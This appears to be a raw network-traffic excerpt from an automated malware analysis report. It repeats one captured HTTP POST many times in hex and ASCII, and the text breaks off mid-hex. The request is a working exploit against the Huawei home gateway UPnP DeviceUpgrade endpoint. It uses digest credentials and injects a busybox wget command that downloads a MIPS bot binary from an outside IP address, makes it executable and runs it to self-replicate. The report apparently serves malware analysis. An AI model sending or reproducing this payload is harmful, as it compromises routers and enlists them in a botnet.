6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 